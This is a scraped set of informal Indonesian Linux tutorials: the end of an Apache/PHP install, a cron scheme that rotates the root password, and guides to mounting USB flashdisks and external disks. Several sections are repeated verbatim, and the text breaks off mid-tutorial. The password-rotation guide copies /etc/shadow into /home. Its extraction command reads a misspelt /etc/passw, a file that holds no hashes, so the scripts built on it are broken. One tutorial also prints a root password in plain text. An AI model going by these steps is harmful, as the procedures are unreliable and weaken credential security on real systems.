drwxr-xr-x 2 root root 312 Jun 10 16:04 build
drwxr-xr-x 2 root root 96 Jun 10 16:04 cgi-bin
drwxr-xr-x 2 root root 336 Jun 10 16:08 conf
drwxr-xr-x 3 root root 1024 Jun 10 16:04 error
drwxr-xr-x 3 root root 1400 Jun 10 17:20 htdocs
drwxr-xr-x 3 root root 4600 Jun 10 16:04 icons
drwxr-xr-x 2 root root 3568 Jun 10 16:04 include
drwxr-xr-x 2 root root 448 Jun 10 16:04 lib
drwxr-xr-x 2 root root 112 Jun 11 13:34 logs
drwxr-xr-x 4 root root 96 Jun 10 16:04 man
drwxr-xr-x 14 root root 8320 Jun 10 16:04 manual
drwxr-xr-x 2 root root 112 Jun 10 16:08 modules
mari kita coba untuk mengaktifkan web server dengan perintah:
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl start
untuk melihat servis apache berjalan dengan baik lakukan perintah berikut:
root@gateway:/usr/local/apache2# ps aux | grep apache
root 3524 1.0 2.1 5920 2684 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3525 1.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3526 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3527 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3528 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3529 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
apabila mendapatkan keluaran seperti yang diatas ini, berarti instalasi apache berjalan dengan baik.
5. Instalasi php
Tahapan terakhir adalah install php nya sendiri. mari kita kembali ke directory /usr/local/src dan memulai dengan extrak dan installasi
root@gateway:/usr/local/src# tar zxvf /home/bdul/php-4.2.3.tar.gz
root@gateway:/usr/local/src# cd php-4.2.3
root@gateway:/usr/local/src# ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql \
--with-sybase=/usr/local/freetds --with-mssql=/usr/local/freetds
root@gateway:/usr/local/src# make
root@gateway:/usr/local/src# make install
kopikan php.ini ke directory /usr/local/lib/php.ini
root@gateway:/usr/local/src# cp php.ini-dist /usr/local/lib/php.ini
edit file httpd.conf pada directory /usr/local/apache2/conf/ dan tambahkan baris berikut
LoadModule php4_module libexec/libphp4.so
AddType application/x-httpd-php .php .phtml
AddType application/x-httpd-php-source .phps
restart apache anda dengan perintah berikut
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl restart
buat file test.php dan letakkan di directory /usr/local/apache2/htdocs. isi file adalah sebagai berikut :
phpinfo();
?>
coba akses file tersebut melalui browser anda, apabila ada keterangan konfigurasi php maka keseluruhan installasi berjalan dengan sukses :-)
jangan lupa untuk mengucapkan 'Alhamdulillah hirobbil alamin'
6. Referensi
www.apache.org
www.php.net
www.mysql.org
www.freetds.org
Pengamanan Shadow Password dengan Bash Scripting + Crontab
1. Persiapan
Login ke level Superuser, lalu buatlah direktori untuk menyimpan file2 shadow password dan direktori untuk file2 script-nya. Terserah anda mau membuatnya dimana..... yang penting mudah dimengerti. Saya meletakkan file2 shadownya di /home/backup/etc dan untuk file script-nya di /home/backup/script.
Lalu backup /etc/shadow ke direktori yg telah anda buat, untuk berjaga-jaga ......... jikalau anda lupa passwd rootnya ....... tinggal di recovery saja .........
[sysadmin@notebook]$ /bin/su root
[root@notebook]# cd /home
[root@notebook]# mkdir -p backup/etc
[root@notebook]# mkdir -p backup/script
[root@notebook]# cp /etc/shadow /home/backup/etc
[root@notebook]# chmod 600 backup
-
Langkah 1. Disini kita membuat passwd baru untuk root
-
[root@notebook]# passwd
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
-
Langkah 2. Kemudian kutip baris yang mengandung kata "root" pada /etc/shadow
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow0
Ulangi lagi langkah 1 dengan passwd yang berbeda, dimana pada langkah 2 anda buat spt ini :
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow1
Ulangi terus dari langkah1 dan langkah 2 tadi..... jangan lupa untuk mengutip passwd root yang telah anda buat berbeda-beda
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow2
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow3
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow4
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow5
-
Ubah permission filenya, lalu lihat apakah file yang memiliki kutipan shadow passwd root sudah komplit ada 6 file -
-
[root@notebook]# chmod 600 /home/backup/etc/*
[root@notebook]# ls -l /home/backup/etc/
-rw------- 1 root root 53 2004-09-12 21:10 shadow0
-rw------- 1 root root 53 2004-09-12 21:11 shadow1
-rw------- 1 root root 53 2004-09-12 21:11 shadow2
-rw------- 1 root root 53 2004-09-12 21:11 shadow3
-rw------- 1 root root 53 2004-09-12 21:11 shadow4
-rw------- 1 root root 53 2004-09-12 21:11 shadow5
2. Pembuatan Script
Pada bagian ini kita akan membuat script yang berfungsi untuk mengubah password /etc/shadow dengan file kutipan shadow passwd root yang anda backup tadi.
Masuk ke direktori /home/backup/script, lalu isi file script tersebut dengan editing favorit anda....
-
[root@notebook]# cd /home/backup/script/
[root@notebook]# vim ubah0
#!/bin/bash
backupfile="/home/backup/etc/shadow0"
usermod -p"`cut -f2 -d: $backupfile`" root
-
[root@notebook]# vim ubah1
#!/bin/bash
backupfile="/home/backup/etc/shadow1"
usermod -p"`cut -f2 -d: $backupfile`" root
-
Buat 6 file script (ubah0, ubah1 s/d ubah5), perhatikan penomoran script maupun penomoran shadow-nya, karena itu bagian yang sensitif .......... ^_^
Setelah ke 6 script tersebut selesai dibuat, ubah permission scriptnya ......
-
[root@notebook]# chmod 700 /home/backup/script/*
[root@notebook]# ls -l /home/backup/script/
-rwx------ 1 root root 114 2004-09-12 21:18 ubah0
-rwx------ 1 root root 114 2004-09-12 21:17 ubah1
-rwx------ 1 root root 114 2004-09-12 21:18 ubah2
-rwx------ 1 root root 114 2004-09-12 21:18 ubah3
-rwx------ 1 root root 114 2004-09-12 21:18 ubah4
-rwx------ 1 root root 114 2004-09-12 21:18 ubah5
3. Mengatur Waktu Eksekusi Script Pengubah Shadow Password Pada Crontab
Pada Skenario ini, aku mengatur script tsb agar dieksekusi setiap 5 menit sekali .......... ^_^
Dimana pada menit ke 1 s/d 29 ... akan meng-eksekusi script ubah0-5, dan pada menit ke 30 s/d 59 akan mengulangi proses eksekusi dari scrip ubah0 lagi .
Tambahkan line ini pada /var/spool/cron/crontabs/root
-
00 * * * * /home/backup/script/./ubah0
05 * * * * /home/backup/script/./ubah1
10 * * * * /home/backup/script/./ubah2
15 * * * * /home/backup/script/./ubah3
20 * * * * /home/backup/script/./ubah4
25 * * * * /home/backup/script/./ubah5
30 * * * * /home/backup/script/./ubah0
35 * * * * /home/backup/script/./ubah1
40 * * * * /home/backup/script/./ubah2
45 * * * * /home/backup/script/./ubah3
50 * * * * /home/backup/script/./ubah4
55 * * * * /home/backup/script/./ubah5
-
Restart crond anda
-
[root@notebook]# killall -HUP crond
-
Lihat penampakan proses eksekusi cronnya di /var/log/cron, perhatikan baik-baik waktunya ............. ^_^
-
[root@notebook]# tail -f /var/log/cron
Sep 12 23:00:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
Sep 12 23:05:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah1
Sep 12 23:10:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah2
Sep 12 23:15:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah3
Sep 12 23:20:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah4
Sep 12 23:25:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah5
Sep 12 23:30:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
.
.
dst ....
Ikuti juga perubahan passwd rootnya
-
[root@notebook]# tail -f /var/log/secure
Sep 12 23:00:01 iman usermod[3519]: change user `root' password
Sep 12 23:05:01 iman usermod[3519]: change user `root' password
Sep 12 23:10:01 iman usermod[3519]: change user `root' password
Sep 12 23:15:01 iman usermod[3519]: change user `root' password
Sep 12 23:20:01 iman usermod[3524]: change user `root' password
Sep 12 23:25:01 iman usermod[3530]: change user `root' password
Sep 12 23:30:02 iman usermod[3533]: change user `root' password
.
.
dst ....
-
Sekarang passwd root anda telah diubah otomatis menggunakan 5 passwd yang berbeda setiap 5 menit...... silahkan anda tambahkan lagi passwdnya jika merasa hal diatas masih kurang secure ..... dengan menambahkan shadow6 s/d seterusnya... atau juga anda set saja tiap menit passwdnya berubah2 terus.
Jangan sampe lupa passwdnya ............ ^_^
Selamat mencoba, Salam dari Medan City
5. Referensi
1. Manual page cut
2. Manual page crond
3. Manual page crontab
4. Manual page usermod
Login ke level Superuser, lalu buatlah direktori untuk menyimpan file2 shadow password dan direktori untuk file2 script-nya. Terserah anda mau membuatnya dimana..... yang penting mudah dimengerti. Saya meletakkan file2 shadownya di /home/backup/etc dan untuk file script-nya di /home/backup/script.
Lalu backup /etc/shadow ke direktori yg telah anda buat, untuk berjaga-jaga ......... jikalau anda lupa passwd rootnya ....... tinggal di recovery saja .........
[sysadmin@notebook]$ /bin/su root
[root@notebook]# cd /home
[root@notebook]# mkdir -p backup/etc
[root@notebook]# mkdir -p backup/script
[root@notebook]# cp /etc/shadow /home/backup/etc
[root@notebook]# chmod 600 backup
-
Langkah 1. Disini kita membuat passwd baru untuk root
-
[root@notebook]# passwd
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
-
Langkah 2. Kemudian kutip baris yang mengandung kata "root" pada /etc/shadow
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow0
Ulangi lagi langkah 1 dengan passwd yang berbeda, dimana pada langkah 2 anda buat spt ini :
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow1
Ulangi terus dari langkah1 dan langkah 2 tadi..... jangan lupa untuk mengutip passwd root yang telah anda buat berbeda-beda
-
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow2
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow3
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow4
[root@notebook]# grep ^root /etc/passw > /home/backup/etc/shadow5
-
Ubah permission filenya, lalu lihat apakah file yang memiliki kutipan shadow passwd root sudah komplit ada 6 file -
-
[root@notebook]# chmod 600 /home/backup/etc/*
[root@notebook]# ls -l /home/backup/etc/
-rw------- 1 root root 53 2004-09-12 21:10 shadow0
-rw------- 1 root root 53 2004-09-12 21:11 shadow1
-rw------- 1 root root 53 2004-09-12 21:11 shadow2
-rw------- 1 root root 53 2004-09-12 21:11 shadow3
-rw------- 1 root root 53 2004-09-12 21:11 shadow4
-rw------- 1 root root 53 2004-09-12 21:11 shadow5
2. Pembuatan Script
Pada bagian ini kita akan membuat script yang berfungsi untuk mengubah password /etc/shadow dengan file kutipan shadow passwd root yang anda backup tadi.
Masuk ke direktori /home/backup/script, lalu isi file script tersebut dengan editing favorit anda....
-
[root@notebook]# cd /home/backup/script/
[root@notebook]# vim ubah0
#!/bin/bash
backupfile="/home/backup/etc/shadow0"
usermod -p"`cut -f2 -d: $backupfile`" root
-
[root@notebook]# vim ubah1
#!/bin/bash
backupfile="/home/backup/etc/shadow1"
usermod -p"`cut -f2 -d: $backupfile`" root
-
Buat 6 file script (ubah0, ubah1 s/d ubah5), perhatikan penomoran script maupun penomoran shadow-nya, karena itu bagian yang sensitif .......... ^_^
Setelah ke 6 script tersebut selesai dibuat, ubah permission scriptnya ......
-
[root@notebook]# chmod 700 /home/backup/script/*
[root@notebook]# ls -l /home/backup/script/
-rwx------ 1 root root 114 2004-09-12 21:18 ubah0
-rwx------ 1 root root 114 2004-09-12 21:17 ubah1
-rwx------ 1 root root 114 2004-09-12 21:18 ubah2
-rwx------ 1 root root 114 2004-09-12 21:18 ubah3
-rwx------ 1 root root 114 2004-09-12 21:18 ubah4
-rwx------ 1 root root 114 2004-09-12 21:18 ubah5
3. Mengatur Waktu Eksekusi Script Pengubah Shadow Password Pada Crontab
Pada Skenario ini, aku mengatur script tsb agar dieksekusi setiap 5 menit sekali .......... ^_^
Dimana pada menit ke 1 s/d 29 ... akan meng-eksekusi script ubah0-5, dan pada menit ke 30 s/d 59 akan mengulangi proses eksekusi dari scrip ubah0 lagi .
Tambahkan line ini pada /var/spool/cron/crontabs/root
-
00 * * * * /home/backup/script/./ubah0
05 * * * * /home/backup/script/./ubah1
10 * * * * /home/backup/script/./ubah2
15 * * * * /home/backup/script/./ubah3
20 * * * * /home/backup/script/./ubah4
25 * * * * /home/backup/script/./ubah5
30 * * * * /home/backup/script/./ubah0
35 * * * * /home/backup/script/./ubah1
40 * * * * /home/backup/script/./ubah2
45 * * * * /home/backup/script/./ubah3
50 * * * * /home/backup/script/./ubah4
55 * * * * /home/backup/script/./ubah5
-
Restart crond anda
-
[root@notebook]# killall -HUP crond
-
Lihat penampakan proses eksekusi cronnya di /var/log/cron, perhatikan baik-baik waktunya ............. ^_^
-
[root@notebook]# tail -f /var/log/cron
Sep 12 23:00:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
Sep 12 23:05:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah1
Sep 12 23:10:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah2
Sep 12 23:15:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah3
Sep 12 23:20:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah4
Sep 12 23:25:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah5
Sep 12 23:30:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
.
.
dst ....
Ikuti juga perubahan passwd rootnya
-
[root@notebook]# tail -f /var/log/secure
Sep 12 23:00:01 iman usermod[3519]: change user `root' password
Sep 12 23:05:01 iman usermod[3519]: change user `root' password
Sep 12 23:10:01 iman usermod[3519]: change user `root' password
Sep 12 23:15:01 iman usermod[3519]: change user `root' password
Sep 12 23:20:01 iman usermod[3524]: change user `root' password
Sep 12 23:25:01 iman usermod[3530]: change user `root' password
Sep 12 23:30:02 iman usermod[3533]: change user `root' password
.
.
dst ....
-
Sekarang passwd root anda telah diubah otomatis menggunakan 5 passwd yang berbeda setiap 5 menit...... silahkan anda tambahkan lagi passwdnya jika merasa hal diatas masih kurang secure ..... dengan menambahkan shadow6 s/d seterusnya... atau juga anda set saja tiap menit passwdnya berubah2 terus.
Jangan sampe lupa passwdnya ............ ^_^
Selamat mencoba, Salam dari Medan City
5. Referensi
1. Manual page cut
2. Manual page crond
3. Manual page crontab
4. Manual page usermod
Flashdisk di Linux
Flashdisk ato orang menyebutnya usb flashdisk adalah piranti kecil penyimpan data portable yang bisa dipakai disemua OS termasuk Linux, untuk mengaktifkan flashdisk ini cukup mudah, syaratnya hanya kernel yang support / mendukung USB, dan biasanya setiap distro (kernel default/bawaan sudah support USB)
1. Cek module usb
Ceklah modul USB apakah sudah terpasang atau belum caranya:
ketik lsmod | grep usb; lsmod | grep ehci
jika sudah terpasang akan terlihat kurang lebih seperti ini:
dihack@idban:~> lsmod | grep usb; lsmod | grep ehci
usb-storage 71168 0
scsi_mod 97248 5 [sd_mod st sr_mod sg usb-storage]
usb-uhci 23888 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
ehci-hcd 18284 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
Catatan: jangan lihat angka - angkanya, tapi perhatikan nama modulenya seperti usb-storage, scsi_mod dan lain lain, jangan lupa untuk memasang juga modul vfat atau fat, karena biasanya type partisi yang digunakan flashdisk adalah FAT16
2. Pasang module usb
Jika module module tadi tidak terpasang, pasanglah satu persatu dng perintah: modprobe nama_module
misalnya modprobe usb-strorage
3. Pasang dan Cek flashdisk
Jika semuanya sudah tepasang, pasanglah flashdisk tadi ke port USB, kemudian jalankan printah dmesg untuk melihat apa yang terjadi
dihack@idban:> dmesg
.....skipped
hub.c: new USB device 00:1d.7-3, assigned address 7
WARNING: USB Mass Storage data integrity not assured
USB Mass Storage device found at 7
SCSI device sda: 251904 512-byte hdwr sectors (129 MB)
sda: Write Protect is off
sda: sda4
contoh diatas adalah flashdisk yang terdeteksi pada Linux dan berada pada SCSI pertama (sda) ini dapat berbeda beda tiap komputer.
4. Cek Type flashdisk
Setelah ini cek type partisi flashdisknya, dengan cara:
sfdisk -l /dev/sda
idban:/root # /sbin/sfdisk -l /dev/sda
Disk /dev/sda: 246 cylinders, 32 heads, 32 sectors/track
Units = cylinders of 524288 bytes, blocks of 1024 bytes, counting from 0
Device Boot Start End #cyls #blocks Id System
/dev/sda1 0 - 0 0 0 Empty
/dev/sda2 0 - 0 0 0 Empty
/dev/sda3 0 - 0 0 0 Empty
/dev/sda4 * 0+ 245 246- 125936 6 FAT16
terlihat disana flashdisk yang berada di sda menggunakan FAT16
5. Edit /etc/fstab
Setelah kita tahu apa type partisinya kemudian buatlah direktory tempat memount flashdisk tadi
misalnya di /mnt/flashdisk dengan perintah mkdir /mnt/flashdisk
Kemudian tambahkan :
/dev/sda4 /mnt/flashdisk vfat sync,noauto,user,exec 0 0
atau:
/dev/sda4 /mnt/flashdisk auto sync,noauto,user,exec 0 0
pada /etc/fstab
6. Proses Mount
Setelah semua tadi beres, flashdisk bisa dimount dengan perintah
mount /dev/sda4
atau
mount /mnt/flasdisk
CATATAN
tahap 2, 4 dan 5 membutuhkan root akses.
==============================================================
Mount otomatis menggunakan autofs
Kalo mau mount otomatis bisa menggunakan autofs/automount. Kalo di redhat tinggal edit /etc/auto.master dan uncomment baris terakhir
/misc /etc/auto.misc --timeout=60
lalu edit juga /etc/auto.misc dan tambahkan line
usbdisk -fstype=vfat,sync,umask=000,uid=500,gid=500 :/dev/sda1
namanya terserah, bisa "usbdisk" atau "unyil", terserah...
Lalu jalankan service autofs (bisa anda buat jalan otomatis waktu boot, kalo belum). Sesudah itu, nanti automount akan otomatis mount di /misc/usbdisk setiap kali anda mengakses ke sana (misalnya dg nautilus atau 'cd' dari shell). Tip: coba sambil perhatikan /var/log/messages untuk memahami urutan prosesnya dari mulai colok USB sampe mount.
LinuxTutorial
Last edited on Tuesday, March 16, 2004 2:09:08 pm.
1. Cek module usb
Ceklah modul USB apakah sudah terpasang atau belum caranya:
ketik lsmod | grep usb; lsmod | grep ehci
jika sudah terpasang akan terlihat kurang lebih seperti ini:
dihack@idban:~> lsmod | grep usb; lsmod | grep ehci
usb-storage 71168 0
scsi_mod 97248 5 [sd_mod st sr_mod sg usb-storage]
usb-uhci 23888 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
ehci-hcd 18284 0 (unused)
usbcore 64844 1 [usb-storage usb-uhci ehci-hcd]
Catatan: jangan lihat angka - angkanya, tapi perhatikan nama modulenya seperti usb-storage, scsi_mod dan lain lain, jangan lupa untuk memasang juga modul vfat atau fat, karena biasanya type partisi yang digunakan flashdisk adalah FAT16
2. Pasang module usb
Jika module module tadi tidak terpasang, pasanglah satu persatu dng perintah: modprobe nama_module
misalnya modprobe usb-strorage
3. Pasang dan Cek flashdisk
Jika semuanya sudah tepasang, pasanglah flashdisk tadi ke port USB, kemudian jalankan printah dmesg untuk melihat apa yang terjadi
dihack@idban:> dmesg
.....skipped
hub.c: new USB device 00:1d.7-3, assigned address 7
WARNING: USB Mass Storage data integrity not assured
USB Mass Storage device found at 7
SCSI device sda: 251904 512-byte hdwr sectors (129 MB)
sda: Write Protect is off
sda: sda4
contoh diatas adalah flashdisk yang terdeteksi pada Linux dan berada pada SCSI pertama (sda) ini dapat berbeda beda tiap komputer.
4. Cek Type flashdisk
Setelah ini cek type partisi flashdisknya, dengan cara:
sfdisk -l /dev/sda
idban:/root # /sbin/sfdisk -l /dev/sda
Disk /dev/sda: 246 cylinders, 32 heads, 32 sectors/track
Units = cylinders of 524288 bytes, blocks of 1024 bytes, counting from 0
Device Boot Start End #cyls #blocks Id System
/dev/sda1 0 - 0 0 0 Empty
/dev/sda2 0 - 0 0 0 Empty
/dev/sda3 0 - 0 0 0 Empty
/dev/sda4 * 0+ 245 246- 125936 6 FAT16
terlihat disana flashdisk yang berada di sda menggunakan FAT16
5. Edit /etc/fstab
Setelah kita tahu apa type partisinya kemudian buatlah direktory tempat memount flashdisk tadi
misalnya di /mnt/flashdisk dengan perintah mkdir /mnt/flashdisk
Kemudian tambahkan :
/dev/sda4 /mnt/flashdisk vfat sync,noauto,user,exec 0 0
atau:
/dev/sda4 /mnt/flashdisk auto sync,noauto,user,exec 0 0
pada /etc/fstab
6. Proses Mount
Setelah semua tadi beres, flashdisk bisa dimount dengan perintah
mount /dev/sda4
atau
mount /mnt/flasdisk
CATATAN
tahap 2, 4 dan 5 membutuhkan root akses.
==============================================================
Mount otomatis menggunakan autofs
Kalo mau mount otomatis bisa menggunakan autofs/automount. Kalo di redhat tinggal edit /etc/auto.master dan uncomment baris terakhir
/misc /etc/auto.misc --timeout=60
lalu edit juga /etc/auto.misc dan tambahkan line
usbdisk -fstype=vfat,sync,umask=000,uid=500,gid=500 :/dev/sda1
namanya terserah, bisa "usbdisk" atau "unyil", terserah...
Lalu jalankan service autofs (bisa anda buat jalan otomatis waktu boot, kalo belum). Sesudah itu, nanti automount akan otomatis mount di /misc/usbdisk setiap kali anda mengakses ke sana (misalnya dg nautilus atau 'cd' dari shell). Tip: coba sambil perhatikan /var/log/messages untuk memahami urutan prosesnya dari mulai colok USB sampe mount.
LinuxTutorial
Last edited on Tuesday, March 16, 2004 2:09:08 pm.
USB HDD External di Linux
writer:
Iman Rahmadsyah Harahap / a_ir_hrp (shakysonyo@hotpop.com)
USB Hdd External merupakan suatu device mobile seperti FlashDisk yang dapat menampung data dengan kapasitas besar dalam ukuran Gigabyte serta bisa digunakan pada Linux.
Device ini merupakan solusi bagi siapa saja yang memiliki keterbatasan kapasitas harddisk, baik notebook, PC ataupun sekedar sebagai data backup.
Jenis & Ragam device USB External ini sangat banyak, tapi 2 hal yang umum adalah dari segi ukuran hard drivenya yaitu Hdd PC (with Adapter Power) & Hdd Notebook (without Adapter Power). Biasanya perangkat USB External ini dijual terpisah antara casing dengan hdd-nya.
1. Persiapan perangkat
- Periksa jumper, terserah anda mau di set sebagai primary, secondary ato lainnya ( Saya lebih suka Primary.... :-p )
- Pasang bus data (cable data) & cable powernya ke hdd.
- Baut/mur hdd ke casing jangan lupa di pasang.
- Sekarang pakaikan bajunya... ehh... salah... pasang casing penutup hdd nya & jgn lupa di baut/mur lagi yach ... :D
2. Persiapan Module
- Gih Baca lagi artikel nya mas Idban ...
- Sekedar mengulang saja (maaf mas Idban... saya contek dikit), lihat module USB anda sudah terpasangkah ?
anda dapat melihatnya dengan menjalankan perintah berikut,
sysadmin@iman$ lsmod |grep usb; lsmod |grep ehci
usb_storage 30464 2
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
ehci_hcd 31108 0
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
-
- Jika module tersebut kelihatan seperti diatas, sampai saat ini anda bisa sedikit lega ...
- Jika tidak kelihatan silahkan jalankan module2-nya... uppss jangan lupa login sebagai root.....
-
sysadmin@iman$ /bin/su -
Password:akusayangmama_:-p
root@iman# modprobe usb_storage
root@iman# modprobe usbcore
root@iman# modprobe uhci_hcd
root@iman# modprobe ehci_hcd
-
- Kalo perintah diatas keluar "FATAL: Module nama_module not found."
silahkan lihat config kernel anda, aktifkan module-module pendukung usb, lalu compile module nya :-(
3. Sentuhan Pertama dan periksa koneksi (Bukan Jaringan yach.... !!)
- Baca doa ... mudah2an berhasil ...
- silahkan alirkan listrik ke badannya ... koq badan sih... maaf.. hidupkan power usb hdd external nya :D
- udah hidup? Atur nafas... nah... sekarang masukkan perlahan2 tapi pasti... ke lubang itu loh... (Awas... jangan piktor !! )
- sekarang periksa apakah sudah ke detect ato belom? (detik-detik penuh kecemasan)
-
root@iman# dmesg
usb 1-1: new full speed USB device using address 3
scsi1 : SCSI emulation for USB Mass Storage devices
Vendor: Maxtor 6 Model: Y080L0 Rev: 0 0
Type: Direct-Access ANSI SCSI revision: 02
SCSI device sda: 160086528 512-byte hdwr sectors (81964 MB)
sda: assuming drive cache: write through
/dev/scsi/host1/bus0/target0/lun0: p1 p2 p3 < p5 p6 >
Attached scsi disk sda at scsi1, channel 0, id 0, lun 0
Attached scsi generic sg0 at scsi1, channel 0, id 0, lun 0, type 0
USB Mass Storage device found at 3
- **fiiuuuhhh ...** (menghela nafas) ... ternyata kedetect... :-D
- sekarang posisi hdd external anda telah dikenal sebagai sda ^_^
4. Membagi partisi & format
- masuk ke fdisk /dev/sda, lalu bagi sesuai kebutuhan anda.
Disini aku bagi menjadi 4 partisi dimana 2 partisi dengan ext3 dan 2 lagi sebagai vfat.
-
root@iman# fdisk /dev/sda
Device Boot Start End Blocks Id System
/dev/sda1 1 2615 21004956 83 Linux
/dev/sda2 2616 5230 21004987+ 83 Linux
/dev/sda3 5231 9964 38025855 5 Extended
/dev/sda5 5231 7845 21004956 b W95 FAT32
/dev/sda6 7846 9964 17020836 b W95 FAT32
- Setelah partisi dibagi & diberi type nya ... silahkan keluar, huss... huss .. hus... :D
- Saatnya memformat partisi tersebut (perhatikan pada sda berapa partisi linux anda)
-
root@iman# mkfs.ext3 /dev/sda1
mke2fs 1.35 (28-Feb-2004)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
2627520 inodes, 5251246 blocks
262562 blocks (5.00%) reserved for the super user
First data block=0
161 block groups
32768 blocks per group, 32768 fragments per group
16320 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done
Creating journal (8192 blocks): done
Writing superblocks and filesystem accounting information: done
-
5. Mount partisi
- buat direktory tempat me-mount partisi dari hdd external anda, lalu mount partisi tersebut
-
root@iman# mkdir /mnt/sda1
root@iman# mkdir /mnt/sda2
root@iman# mount /dev/sda1 /mnt/sda1
root@iman# mount /dev/sda2 /mnt/sda2
- Anda mau partisi2 tersebut mount secara automount saat booting ataupun saat di colokin?
Gih Baca lagi artikelnya mas idban ... Ok.... :D
- Jangan terlalu banyak terguncang pada saat hdd hidup ya...!!!
- Salam dari Medan
6. Referensi
Flashdisk - Idban Secandri
Man fdisk
Man mount
Man lsmod
Man modprobe
Man mkfs.ext3
Man si Iman a_ir_hrp .... hehehehe :D
SELAMAT MENCOBA
Salam dari Medan City .....
-------------------------------------------------------------------------------------------
<<--I.R-Harahap-Medan -->>
Aku bukanlah orang yang merasa pandai :-(
Aku selalu menganggap diriku orang yg kekurangan :-(
Dgn kekurangan itulah aku mau belajar agar bisa pandai ^_^
-------------------------------------------------------------------------------------------
- a_ir_hrp
- 081-361-305-777
- Feb, 15 1981
- My site http://iman.medanlinux.com
- Aku Cuman Seorang Manusia biasa
Cara penggunaan device ini sangat mudah seperti menggunakan Flashdisk..... (Ref. Baca artikel mas Idban Secandri ttg Flashdisk )
Nb. 1. Diasumsikan bahwa hdd tsb masih perawan ... eeehhh.... salah.. maaf.. masih belum di bagi atau di format partisinya .. :D
2. Hdd yang digunakan adalah jenis Hdd PC biasa Maxtor 80 Gb 7200rpm.
3. Di ujicoba ditempat yang sangat menyedihkan dengan mesin Slackware 10 - kernel-2.6.8 :-(
Iman Rahmadsyah Harahap / a_ir_hrp (shakysonyo@hotpop.com)
USB Hdd External merupakan suatu device mobile seperti FlashDisk yang dapat menampung data dengan kapasitas besar dalam ukuran Gigabyte serta bisa digunakan pada Linux.
Device ini merupakan solusi bagi siapa saja yang memiliki keterbatasan kapasitas harddisk, baik notebook, PC ataupun sekedar sebagai data backup.
Jenis & Ragam device USB External ini sangat banyak, tapi 2 hal yang umum adalah dari segi ukuran hard drivenya yaitu Hdd PC (with Adapter Power) & Hdd Notebook (without Adapter Power). Biasanya perangkat USB External ini dijual terpisah antara casing dengan hdd-nya.
1. Persiapan perangkat
- Periksa jumper, terserah anda mau di set sebagai primary, secondary ato lainnya ( Saya lebih suka Primary.... :-p )
- Pasang bus data (cable data) & cable powernya ke hdd.
- Baut/mur hdd ke casing jangan lupa di pasang.
- Sekarang pakaikan bajunya... ehh... salah... pasang casing penutup hdd nya & jgn lupa di baut/mur lagi yach ... :D
2. Persiapan Module
- Gih Baca lagi artikel nya mas Idban ...
- Sekedar mengulang saja (maaf mas Idban... saya contek dikit), lihat module USB anda sudah terpasangkah ?
anda dapat melihatnya dengan menjalankan perintah berikut,
sysadmin@iman$ lsmod |grep usb; lsmod |grep ehci
usb_storage 30464 2
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
ehci_hcd 31108 0
usbcore 117092 5 ehci_hcd,usb_storage,uhci_hcd
-
- Jika module tersebut kelihatan seperti diatas, sampai saat ini anda bisa sedikit lega ...
- Jika tidak kelihatan silahkan jalankan module2-nya... uppss jangan lupa login sebagai root.....
-
sysadmin@iman$ /bin/su -
Password:akusayangmama_:-p
root@iman# modprobe usb_storage
root@iman# modprobe usbcore
root@iman# modprobe uhci_hcd
root@iman# modprobe ehci_hcd
-
- Kalo perintah diatas keluar "FATAL: Module nama_module not found."
silahkan lihat config kernel anda, aktifkan module-module pendukung usb, lalu compile module nya :-(
3. Sentuhan Pertama dan periksa koneksi (Bukan Jaringan yach.... !!)
